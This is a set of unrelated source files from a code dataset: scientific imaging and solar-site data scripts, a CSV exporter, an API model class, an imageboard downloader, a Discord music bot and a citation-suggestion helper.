plate_paths = get_image_paths(g, wells)
except TypeError:
print("ERROR: YAML parameter \"wells\" improperly formated (or none provided) or failure to retrieve image paths.")
# update g with wells & plate_paths and print contents (except for plate_paths)
g = g._replace(wells=wells, plate_paths=plate_paths)
for (i, j) in zip(g._fields[:-1], g[:-1]):
print("{}:\t{}".format(i, j))
##########################################
######### RUN CELLPROFILER #########
##########################################
if 'cellprofiler' in modules.keys():
pipeline = modules['cellprofiler']['pipeline'][0]
fl_command = 'Rscript wrmXpress/scripts/cp/generate_filelist_{}.R {} {}'.format(
pipeline, g.plate, g.wells)
fl_command_split = shlex.split(fl_command)
print('Generating file list for CellProfiler.')
subprocess.run(fl_command_split)
cp_command = 'cellprofiler -c -r -p wrmXpress/cp_pipelines/pipelines/{}.cppipe --data-file=input/image_paths_{}.csv'.format(
pipeline, pipeline)
cp_command_split = shlex.split(cp_command)
print('Starting CellProfiler.')
subprocess.run(cp_command_split)
md_command = 'Rscript wrmXpress/scripts/metadata_join_master.R {}'.format(
g.plate)
md_command_split = shlex.split(md_command)
print('Joining experiment metadata and tidying.')
subprocess.run(md_command_split)
######################################
######### RUN PY MODULES #########
######################################
# Each module will give a single phenotypic value, which is then written
# out to a CSV. out_dict is a dictionary of well: [phenotype1, phenotype2, etc.]
# that will later be converted to a DataFrame and written to a csv.
# cols includes all the column names that will be in the output
# DataFrame. When the modules are run below, they need to append the column
# name to cols and the phenotypic value to out_dict['well'].
if 'cellprofiler' not in modules.keys():
out_dict = defaultdict(list)
cols = []
# start the well-by-well iterator
for well, well_paths in zip(wells, plate_paths):
print("Running well {}".format(well))
if 'convert' in modules.keys():
# get the value of reorganize and pass it to the module
reorganize = modules.get('convert').get('save_video')
multiplier = float(modules.get(
'convert').get('rescale_multiplier'))
video = convert_video(g, well, well_paths, reorganize, multiplier)
print('{}: module \'convert\' finished'.format(well))
if 'segment' in modules.keys():
if n_waves != 1:
wave_length = modules.get('segment').get('wavelength')
# filter for the paths to the wavelengths to be segmented
well_paths = [
path for path in well_paths if wave_length in str(path)]
worm_area = segment_worms(g, well, well_paths)
if 'worm_area' not in cols:
cols.append('worm_area')
out_dict[well].append(worm_area)
print('{}: module \'segment\' finished'.format(well))
if 'motility' in modules.keys():
# don't use a rescaled video for flow
video = convert_video(g, well, well_paths, False, 1)
flow = dense_flow(g, well, video)
if 'optical_flow' not in cols:
cols.append('optical_flow')
out_dict[well].append(flow)
print('{}: module \'motility\' finished'.format(well))
###############################################
######### WRITE DATA #########
###############################################
df = pd.DataFrame.from_dict(out_dict, orient='index', columns=cols)
output.joinpath('data').mkdir(parents=True, exist_ok=True)
outpath = output.joinpath('data', plate + '_data' + ".csv")
df.to_csv(path_or_buf=outpath, index_label='well')
md_command = 'Rscript wrmXpress/scripts/metadata_join_master.R {}'.format(g.plate)
md_command_split = shlex.split(md_command)
subprocess.run(md_command_split)
###############################################
######### GENERATE THUMBNAILS #########
###############################################
if 'dx' in modules.keys():
# one for each wavelength (TimePoint1)
if n_waves == 1:
type = ''
print("Generating w1 thumbnails")
generate_thumbnails(g, type)
else:
for i in range(1, n_waves + 1):
type = 'w' + str(i)
print("Generating {} thumbnails".format(type))
generate_thumbnails(g, type)
# one for each specific module
dx_types = []
if 'segment' in modules:
dx_types.append('binary')
if 'motility' in modules:
dx_types.append('motility')
for type in dx_types:
print("Generating {} thumbnails".format(type))
generate_thumbnails(g, type)
|
the-stack_106_30655 | from time import perf_counter as tpc
import nevergrad as ng
from opt import Opt
class OptNB(Opt):
"""Minimizer based on the NoisyBandit method from "nevergrad" package."""
name = 'NB'
def prep(self, evals=1.E+7):
self.evals = int(evals)
return self
def solve(self):
t = tpc()
par = ng.p.Array(shape=(self.d,), lower=self.a, upper=self.b)
opt = ng.optimizers.registry['NoisyBandit'](budget=self.evals,
parametrization=par, num_workers=1)
self.x = opt.minimize(self.f0).value
self.y = self.f0(self.x)
self.t = tpc() - t
def to_dict(self):
res = super().to_dict()
res['evals'] = self.evals
return res
|
the-stack_106_30658 | """
Classes to handle scopeout's interactions with the filesystem,
particularly data export/import.
"""
import logging
import os
from csv import *
from datetime import datetime
from collections import Iterable
from scopeout.models import Waveform
FILE_HEADER = 'Waveforms generated by ScopeOut Data Acquisition Tool. \nFile Generated {}\n\n'
class WaveformCsvFile:
"""
Handle reading/writing a waveform or list of waveforms to a .csv file.
"""
def __init__(self, waveform, path):
"""
Constructor.
:param waveform: a single waveform or list of waveforms.
:param path: an absolute path to the .csv file, whether it exists yet or not.
"""
self.writer = None
self.reader = None
self.file = None
self.path = path
self.logger = logging.getLogger('ScopeOut.filesystem.WaveformCsvFile')
try:
assert isinstance(waveform, (Waveform, Iterable))
self.waveform = waveform
except AssertionError:
self.logger.error('WaveformCsvFile must be instantiated with a waveform or iterable of waveforms.')
except Exception as e:
self.logger.error(e)
def __enter__(self):
if os.path.exists(self.path):
self.file = open(self.path, newline='')
self.reader = reader(self.file)
else:
self.file = open(self.path, 'w', newline='')
self.writer = writer(self.file)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.file.close()
@staticmethod
def _write_header(file):
"""
Write the standard data header to a file.
:param file: the output file, opened for wrtiting.
"""
file.write(FILE_HEADER.format(datetime.utcnow()))
@staticmethod
def _write_footer(file):
"""
Write the standard data footer to a file.
:param file: the output file, opened for writing.
"""
pass
def _write_wave(self, wave):
"""
Write all of a wave's information to an open file.
:param wave: a Waveform.
:param file: an open file to write to.
"""
assert isinstance(wave, Waveform)
wave_dict = sorted(wave.__dict__.items())
for key, value in wave_dict:
if not isinstance(value, list) and not key.startswith('_'):
self.writer.writerow([key, value])
self.writer.writerow([''])
self.writer.writerow(['X', 'Y'])
for i in range(0, len(wave.x_list)):
try:
self.writer.writerow([str(wave.x_list[i]), str(wave.y_list[i])])
except IndexError:
self.logger.error('X and Y data incompatible.')
self.writer.writerow([''])
def write(self):
"""
Dump the entire contents of the wrapped waveforms(s) to disk.
"""
if not self.file:
self.file = open(self.path, 'w', newline='')
self.writer = writer(self.file)
WaveformCsvFile._write_header(self.file)
if isinstance(self.waveform, Iterable):
for wave in self.waveform:
self._write_wave(wave)
elif isinstance(self.waveform, Waveform):
self._write_wave(self.waveform)
WaveformCsvFile._write_footer(self.file)
def write_properties(self, properties=[]):
"""
Write the specified properties of the wrapped waveform(s) to disk.
:param properties: an iterable of wave property names.
"""
if not self.file:
self.file = open(self.path, 'w', newline='')
self.writer = writer(self.file)
if not properties:
if isinstance(self.waveform, Iterable):
properties = [key for key, value in self.waveform[0].__dict__.items()
if not key.startswith('_') and not isinstance(value, list)]
else:
properties = [key for key, value in self.waveform.__dict__.items()
if not key.startswith('_') and not isinstance(value, list)]
WaveformCsvFile._write_header(self.file)
self.writer.writerow(properties)
if isinstance(self.waveform, Iterable):
for wave in self.waveform:
self.writer.writerow([getattr(wave, property) for property in properties])
else:
self.writer.writerow([getattr(self.waveform, property) for property in properties])
|
the-stack_106_30659 | """
A script to derive a national PV site list.
- First Authored 2018-11-22
- Owen Huxley <[email protected]
"""
import pandas as pd
import numpy as np
import time as TIME
from datetime import datetime
import picklecache
import os
import re
import io
import codecs
import pickle
import sys
from configparser import ConfigParser
def main():
SLDerivation = SiteListDerivation()
def cached(cachefile):
"""
A function that creates a decorator which will use "cachefile" for caching the results of the decorated function "fn".
"""
def decorator(fn): # define a decorator for a function "fn"
def wrapped(*args, **kwargs): # define a wrapper that will finally call "fn" with all arguments
# if cache exists -> load it and return its content
if os.path.exists(cachefile):
with open(cachefile, 'rb') as cachehandle:
print("using cached result from '%s'" % cachefile)
return pickle.load(cachehandle)
# execute the function with all arguments passed
res = fn(*args, **kwargs)
# write to cache file
with open(cachefile, 'wb') as cachehandle:
print("saving result to cache '%s'" % cachefile)
pickle.dump(res, cachehandle)
return res
return wrapped
return decorator # return this "customized" decorator that uses "cachefile"
class SiteListDerivation:
"""A class to derive the national PV sitelist from the raw data files."""
def __init__(self, options=None):
self.quiet = False
self.FIT_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/FIT/feed_in_tariff_installation_report_-_30_sept_2018_complete.csv"
self.RO_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/RO/RO - AccreditedStationsExternalPublic.csv"
self.REPD_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/REPD/repd-database-sep-2018.csv"
self.SM_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/SM/SM_report_4_20181122.csv"
self.EL_file = r"C:/Users/owenh/Google Drive/PhD/Analysis_Owen/Capacity Mismatch Paper/"\
"raw/EL/Solar_Sheffield_Site_Data.csv"
self.config_file = "Config/PV_site_list_derivation.ini"
self.config = self.load_config(self.config_file)
self.data = None
self.run()
def run(self):
"""The main function that executes all the class methods."""
# loading FIT
# ========================================================================
self.myprint("Loading the FIT data and sorting by installed capacity....",
time_section="start")
FIT_data = self.load_FIT()
self.myprint(" --> Finished.", time_section="stop")
# loading REPD
# =========================================================================
self.myprint("Loading the REPD data and sorting by installed capacity....",
time_section="start")
REPD_data = self.load_REPD()
self.myprint(" --> Finished.", time_section="stop")
# loading SM
# =========================================================================
self.myprint("Loading the SM data and sorting by installed capacity....",
time_section="start")
SM_data = self.load_SM()
self.myprint(" --> Finished.", time_section="stop")
# loading EL
# =========================================================================
self.myprint("Loading the EL data and sorting by installed capacity....",
time_section="start")
EL_data = self.load_EL()
self.myprint(" --> Finished.", time_section="stop")
# loading RO
# =========================================================================
self.myprint("Loading the RO data and sorting by installed capacity....",
time_section="start")
RO_data = self.load_RO()
self.myprint(" --> Finished.", time_section="stop")
self.data = {"FIT_data" : FIT_data, "REPD_data" : REPD_data, "SM_data" : SM_data,
"EL_data" : EL_data, "RO_data" : RO_data}
# ========================================================================
self.derivation()
# import pdb; pdb.set_trace()
def derivation(self, sm_cut_off=5):
"""
Here the national sitelist is derived.
Parameters
----------
`sm_cot_off` : float
The cut off in MW to use for selecting non-fit data from Solar Media
in deriving the site-list.
Returns
-------
`parameter` : type
Description
Notes
-----
See Also
--------
"""
repd_geq_cutoff = self.data["REPD_data"].loc[self.data["REPD_data"]["Capacity"]
>= sm_cut_off].copy()
sm_leq_cutoff = self.data["SM_data"].loc[self.data["SM_data"]["Capacity"] < sm_cut_off
& ~self.data["SM_data"]["Funding"].isin(["FIT"])].copy()
fit_leq_5 = self.data["FIT_data"].loc[self.data["FIT_data"]["Capacity"]
< sm_cut_off].copy()
frames = (repd_geq_cutoff, sm_leq_cutoff, fit_leq_5)
site_list = pd.concat(frames)
# import pdb; pdb.set_trace()
@staticmethod
def load_config(file=""):
"""
A function to load the config file.
Parameters
----------
`file` : str
The path of the config file.
Returns
-------
`config` : dict
A dictionary containing the config parameters.
"""
try:
parser = ConfigParser()
config = {}
parser.read(file)
config["config_location"] = file
config["mysql_options_readwrite_capacity_analysis"] = parser\
.get("mysql_files",
"mysql_options_ssfdb2_readwrite_capacity_analysis")
config["error_logfile"] = parser.get("other", "error_logfile")
config["soalarsite_table"] = parser.get("mysql_tables", "solarsite_table")
return config
except:
print("Error loading config, please check that config file exists and lists all of the"
" required values.")
raise
@cached("../data/site_list/fit_datframe.pickle")
def load_FIT(self):
with open(self.FIT_file, 'r') as fid:
data = []
fit_not_pv = 0
next(fid)
i = 1
j = 0
print_progress(j, 900000)
for line in fid:
i += 1
# line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
# if len(row) == 1:
# continue
if len(row) != 19:
raise Exception("Parsed the wrong number of columns on line {} of the EL file "
"('{}').".format(i, self.FIT_file))
elif row[2] == "Photovoltaic":
j += 1
if 100000 % j:
print_progress(j, 900000)
# postcode = row[1] # if row[1]!="" else np.nan
capacity = float(row[3]) / 1000. if self.isNumber(row[3]) else np.nan
declared_net_capacity = float(row[4]) / 1000. if self.isNumber(row[4]) else np.nan
commission_date = datetime.strptime(row[6], "%d-%m-%Y %H:%M:%S").date() if row[6] != "" else np.nan
# lat
# lon
this_data = [row[0], row[1], capacity, declared_net_capacity, commission_date, row[8]]
# if this_data not in data:
data.append(this_data)
else:
fit_not_pv += 1
print_progress(900000, 900000)
df = pd.DataFrame(np.array(data), columns=["Extension", "Postcode", "Capacity", "DN Capacity", "Install Date", "Export Status"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "FIT"
return df
def load_REPD(self):
"""
Loads REPD csv file
"""
# ID, capacity, postcode, install_date
with io.open(self.REPD_file, "rt", newline="") as fid:
data = []
next(fid)
content = fid.read()
content = re.sub(r'"[^"]*"', lambda m: m.group(0).replace("\r", " ").replace("\n", " "),
content)
i = 1
for line in content.split("\r\n"):
i += 1
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
continue
if len(row) != 45:
raise Exception("Parsed the wrong number of columns on line {} of the REPD file "
"('{}').".format(i, filename))
test = (row[5] == "Solar Photovoltaics") and (row[15] == "Operational")
if test:
instal_date = datetime.strptime(row[44], "%Y-%m-%d").date() if row[44] != "" else np.nan
capacity = float(row[6]) if self.isNumber(row[6]) else np.nan
fit = self.isNumber(row[9])
data.append([row[1], capacity, row[21], row[22], row[23], instal_date])
else:
continue
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode", "Eastings",
"Northings", "Install Date"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "REPD"
return df
def load_RO(self):
"""
Loads RO csv file
"""
# ID, capacity, postcode, install_date
data = []
with io.open(self.RO_file, "rt", newline="\r\n") as fid:
next(fid)
i = 1
for line in fid:
i += 1
# import pdb; pdb.set_trace()
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
continue
if len(row) != 14:
raise Exception("Parsed the wrong number of columns on line {} of the RO file "
"('{}').".format(i, self.RO_file))
postcode = re.findall("[A-Z][A-Z]?[0-9][0-9]? *[0-9][A-Z][A-Z]", row[-1])
postcode = postcode[0] if len(postcode) > 0 else ""
install_date = datetime.strptime(row[9], "%d/%m/%Y").date() if row[9] != "" else np.nan
capacity = float(row[4]) / 1000. if self.isNumber(row[4]) else np.nan
data.append([row[0], capacity, postcode, install_date])
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode", "Install Date"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "RO"
return df
def load_SM(self):
"""
Loads solar media csv file
Notes
-----
The Solar Media file should be saved as a csv
with only the following columns:
Solar Media Ref #, Site Name, Final Capacity MWp-dc, Postal Address, Postcode, Postal Town,
County, District, Region, Country, Eastings, Northings, Day-Month-Year, Completion Month,
Completion Quarter, Completion Calendar Year, Original Funding Route, Final Funding Route.
Be careful when data is deleted using excel. The column must be right-clicked and deleted
otherwise excel will leave empty strings inplace of deleted data.
ID, capacity, postcode, install_date
"""
data = []
with io.open(self.SM_file, "rt", newline="") as fid:
# skipping header line
next(fid)
# reading file as one long string
content = fid.read()
i = 1
for line in content.split("\r\n"):
i += 1
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
continue
if len(row) != 18:
raise Exception("Parsed the wrong number of columns on line {} of the SM file "
"('{}').".format(i, filename))
install_date = datetime.strptime(row[12], "%d-%m-%Y").date() if row[12] != "" else np.nan
capacity = float(row[2]) if self.isNumber(row[2]) else np.nan
data.append([row[0], capacity, row[4], row[10], row[11], install_date, row[-1]])
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode", "Eastings", "Northings",
"Install Date", "Funding"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "SM"
return df
def load_EL(self):
"""
Loads Electralink csv file
ID, capacity, postcode, install_date
"""
data = []
with io.open(self.EL_file, "rt", newline="\r\n") as fid:
next(fid)
i = 1
for line in fid:
i += 1
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
print("row of length 1")
continue
if len(row) != 14:
raise Exception("Parsed the wrong number of columns on line {} of the EL file "
"('{}').".format(i, filename))
postcode = row[4] if row[4]!="" else np.nan
capacity = float(row[6]) / 1000. if self.isNumber(row[6]) else np.nan
earliest_gen_date = datetime.strptime(row[7], "%Y-%m-%d").date() if row[7] != "" else np.nan
ro_repd_gen_date = datetime.strptime(row[8], "%Y-%m-%d").date() if row[8] != "" else np.nan
lat = float(row[9]) / 1000. if self.isNumber(row[9]) else np.nan
lon = float(row[10]) / 1000. if self.isNumber(row[10]) else np.nan
this_data = [row[0].strip(), capacity, postcode, earliest_gen_date,
ro_repd_gen_date, lat, lon]
if this_data not in data:
data.append(this_data)
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode",
"Earliest Gen Date", "RO/REPD Start Date",
"Lat", "Lon"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "EL"
return df
# def upload_SL_to_db(self):
@staticmethod
def isNumber(x):
"""
number check
"""
try:
float(x)
return True
except ValueError:
return False
def myprint(self, msg, time_section=None):
"""
Use this function to print updates unless class attribute quiet is set to True.
Parameters
----------
`msg` : str
The message to be printed.
`time_section`: str
A command to specify whether timing should "start" or "stop".
"""
if not self.quiet:
if time_section == "stop":
msg += " ({:.2f} seconds)".format(TIME.time() - self.timer)
print(msg)
if time_section == "start":
self.timer = TIME.time()
def print_progress(iteration, total, prefix='', suffix='', decimals=2, bar_length=100):
"""
Call in a loop to create terminal progress bar.
Parameters
----------
`iteration` : int
current iteration (required)
`total` : int
total iterations (required)
`prefix` : string
prefix string (optional)
`suffix` : string
suffix string (optional)
`decimals` : int
number of decimals in percent complete (optional)
`bar_length` : int
character length of bar (optional)
Notes
-----
Taken from `Stack Overflow <http://stackoverflow.com/a/34325723>`_.
"""
filled_length = int(round(bar_length * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
progress_bar = '#' * filled_length + '-' * (bar_length - filled_length)
sys.stdout.write('\r%s |%s| %s%s %s' % (prefix, progress_bar, percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
sys.stdout.flush()
if __name__ == "__main__":
main() |
the-stack_106_30660 | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
from datadog_api_client.v1.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class UsageAnalyzedLogsHour(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"analyzed_logs": (int,), # noqa: E501
"hour": (datetime,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
"analyzed_logs": "analyzed_logs", # noqa: E501
"hour": "hour", # noqa: E501
}
_composed_schemas = {}
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""UsageAnalyzedLogsHour - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
analyzed_logs (int): Contains the number of analyzed logs.. [optional] # noqa: E501
hour (datetime): The hour for the usage.. [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
the-stack_106_30661 | # Python 4chan Downloader
import argparse
import os
import re
import time
import wget
from straight.plugin import load
from plugins.ChanParserInterface import ChanParserInterface
from datetime import datetime
class PFourChanDL(object):
def __init__(self):
self.params = None
def main(self):
# Parsing arguments
argparser = argparse.ArgumentParser(description="Download files from 4chan and other imageboards")
argparser.add_argument('--min_space', type=int, default=1,
help="Minimum empty space in disk to download, in GB")
argparser.add_argument('-i', '--imageboard', type=str, default="4chan", help="Imageboard to download from")
argparser.add_argument('-t', '--thread', type=str)
argparser.add_argument('-b', '--board', type=str)
argparser.add_argument('-o', '--output', type=str, default="./")
argparser.add_argument('-a', '--board_archive', dest='board_archive', action='store_true', default=False,
help="Define if must download the board archive too")
argparser.add_argument('-p', '--save_page', dest='save_page', action='store_true', default=False,
help="Define if the html page of the thread will be saved too")
self.params = argparser.parse_args()
plugin_instances = load("plugins", subclasses=ChanParserInterface).produce()
parser = None
for plugin in plugin_instances:
if plugin.its_me(self.params.imageboard):
parser = plugin
if parser is None:
print(self.params.imageboard, "imageboard support not implemented yet!")
quit()
else:
print(parser.__class__.__name__, "selected")
if self.params.thread is not None:
board_name, thread_title, links = parser.parse_thread(self.params.thread)
self.download_thread_files(board_name, thread_title, links)
elif self.params.board is not None:
threads = parser.parse_board(self.params.board, self.params.board_archive)
count = 0
total = len(threads)
for thread in threads:
count = count + 1
print("({}/{}) - Download {}".format(count, total, thread))
board_name, thread_title, links = parser.parse_thread(thread)
self.download_thread_files(board_name, thread_title, links)
print("OK! Files downloaded.")
def download_thread_files(self, board_name, thread_title, links):
dest_directory = "{}{}/{}".format(self.params.output,
self.get_valid_filename(board_name),
self.get_valid_filename(thread_title))
print("Destination:", dest_directory)
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
count = 0
total = len(links)
for link in links:
count = count + 1
print("({}/{})".format(count, total))
self.download_file(link, dest_directory)
time.sleep(0.05)
@staticmethod
def download_file(url, dest_directory):
dest_filename = "{}/{}".format(dest_directory, wget.filename_from_url(url))
if os.path.exists(dest_filename):
print(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), "- Already downloaded file ", dest_filename)
return
print(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), "- Downloading file ", dest_filename)
try:
wget.download(url, dest_filename)
print()
except:
print(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), "- Error downloading file ", dest_filename)
"""Make filename Windows-safe"""
@staticmethod
def get_valid_filename(s):
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '-', s)
|
the-stack_106_30662 | import discord
from discord.ext import commands
#import youtube_dl
import os
from pytube import YouTube
token = open("token.txt", "r").read()
mainaccid=open("mainaccid.txt", "r").read()
bot = commands.Bot(command_prefix='!joker ')
@bot.event
async def on_ready():
print('We have logged in as {0.user}'.format(bot))
@bot.command()
async def play(ctx, url : str):
## song_there = os.path.isfile(r"C:\Users\user\Desktop\discord bot\song.mp4")
## try:
## if song_there:
## os.remove(r"C:\Users\user\Desktop\discord bot\song.mp4")
## except PermissionError:
## await ctx.send("Wait for the current playing music to end or use the 'stop' command :negative_squared_cross_mark:")
## return
try:
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=str(ctx.message.author.voice.channel))
await voiceChannel.connect()
await ctx.send("Joined "+str(ctx.message.author.voice.channel)+" voice channel!:white_check_mark:")
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
except AttributeError:
await ctx.send(ctx.message.author.mention+" is not in any voice channel :negative_squared_cross_mark:")
return
except:
await ctx.send(ctx.message.author.mention+" joker in another voice channel of this server \n Cannot be in two voice channels simultaneously :negative_squared_cross_mark:")
## ydl_opts = {
## 'format': 'bestaudio/best',
## 'postprocessors': [{
## 'key': 'FFmpegExtractAudio',
## 'preferredcodec': 'mp3',
## 'preferredquality': '192',
## }],
## }
## with youtube_dl.YoutubeDL(ydl_opts) as ydl:
## ydl.download([url])
yt=YouTube(str(url))
yt_embed=discord.Embed(title=yt.title+":musical_note:",description=yt.description,color=discord.Colour.red())
yt_embed.set_thumbnail(url=yt.thumbnail_url)
yt_embed.add_field(name="Author: ",value=yt.author+":musical_score: ",inline=False)
yt_embed.add_field(name="Duration: ",value=str(yt.length)+" seconds :clock3: ",inline=False)
yt_embed.add_field(name="Publish date: ",value=str(yt.publish_date)+":calendar_spiral:",inline=False)
yt_embed.add_field(name="Rating: ",value=str(yt.rating)+":star2:",inline=False)
yt_embed.add_field(name="Views: ",value=str(yt.views)+":eyes:",inline=False)
t=yt.streams.filter(only_audio=True)
t[0].download(r"C:\Users\user\Desktop\discord bot")
## for file in os.listdir("./"):
## if file.endswith(".mp4"):
## os.rename(file, r"C:\Users\user\Desktop\discord bot\song.mp4")
voice.play(discord.FFmpegPCMAudio(yt.title+".mp4"))
await ctx.send("Playing "+yt.title+" :loud_sound:")
await ctx.send(embed=yt_embed)
@bot.command(aliases=["disconnect","exit"])
async def leave(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
if voice.is_connected():
await voice.disconnect()
await ctx.send("Disconnected :wave:")
else:
await ctx.send("The bot is not connected to a voice channel. :negative_squared_cross_mark:")
@bot.command()
async def pause(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
if voice.is_playing():
voice.pause()
await ctx.send("Paused :pause_button:")
else:
await ctx.send("Currently no audio is playing. :negative_squared_cross_mark:")
@bot.command()
async def resume(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
if voice.is_paused():
voice.resume()
await ctx.send("Resumed :play_pause: ")
else:
await ctx.send("The audio is not paused. :negative_squared_cross_mark:")
@bot.command()
async def stop(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
voice.stop()
await ctx.send("Stopped playing :octagonal_sign: ")
bot.run(token)
|
the-stack_106_30663 | '''
Created on Nov 1, 2014
@author: ehenneken
'''
from __future__ import absolute_import
# general module imports
import sys
import os
import operator
from itertools import groupby
from flask import current_app
from .utils import get_data
from .utils import get_meta_data
__all__ = ['get_suggestions']
def get_suggestions(**args):
# initializations
papers = []
bibcodes = []
if 'bibcodes' in args:
bibcodes = args['bibcodes']
if len(bibcodes) == 0:
return []
# Any overrides for default values?
Nsuggestions = current_app.config.get('CITATION_HELPER_NUMBER_SUGGESTIONS')
# get rid of potential trailing spaces
bibcodes = [a.strip() for a in bibcodes][
:current_app.config.get('CITATION_HELPER_MAX_INPUT')]
# start processing
# get the citations for all publications (keeping multiplicity is
# essential)
papers = get_data(bibcodes=bibcodes)
if "Error" in papers:
return papers
# removes papers from the original list to get candidates
papers = [a for a in papers if a not in bibcodes]
# establish frequencies of papers in results
paperFreq = [(k, len(list(g))) for k, g in groupby(sorted(papers))]
# and sort them, most frequent first
paperFreq = sorted(paperFreq, key=operator.itemgetter(1), reverse=True)
# remove all papers with frequencies smaller than threshold
paperFreq = [a for a in paperFreq if a[1] > current_app.config.get(
'CITATION_HELPER_THRESHOLD_FREQUENCY')]
# get metadata for suggestions
meta_dict = get_meta_data(results=paperFreq[:Nsuggestions])
if "Error"in meta_dict:
return meta_dict
# return results in required format
return [{'bibcode': x, 'score': y, 'title': meta_dict[x]['title'],
'author':meta_dict[x]['author']} for (x, y) in
paperFreq[:Nsuggestions] if x in meta_dict.keys()]
|
the-stack_106_30666 | #!/usr/bin/env python
"""
Goal:
* Interact with XMR.to.
xmrto_wrapper create-order --destination 3K1jSVxYqzqj7c9oLKXC7uJnwgACuTEZrY --btc-amount 0.001
How to:
* General usage
